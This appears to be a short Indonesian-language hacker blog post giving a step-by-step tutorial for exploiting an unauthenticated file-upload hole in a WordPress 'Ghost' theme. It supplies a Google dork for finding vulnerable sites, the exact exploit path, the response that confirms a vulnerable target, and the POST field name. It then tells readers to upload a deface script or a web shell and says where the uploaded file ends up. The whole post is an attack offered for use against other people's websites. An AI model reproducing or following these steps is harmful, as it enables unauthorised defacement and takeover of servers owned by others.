ga usah banyak bacot langsung gas
dork : inurl:/wp-content/themes/Ghost
exploit : /Ghost/includes/uploadify/upload_settings_image.php
akses : target.com/wp-content/uploads/settingsimages
tool online : DISINI
tutorial
1.pertama" lu dorking dulu make dork di atas ( kembangin kalo bisa )
2.nah kalian coba satu", masukin exploit, kalo vuln ada tulisan [ {"status":"NOK", "ERR":"This file is incorect"} ]
3.kalo vuln kalian cari CSRF ONLINE <-- atau pake tool gw :v
4.kalian paste url target dan post file nya kalian tulis Filedata
4.kalian paste url target dan post file nya kalian tulis Filedata
5.kalo sudah tinggal gasken upload script deface kalian atau upload shell kalian ( kalo hoki :v )
Letak filenya ? target.com/wp-content/uploads/settingsimages/(filelu)
makasih ya gan dah berkunjung ke website gw
./Bang4Y1N
0 Komentar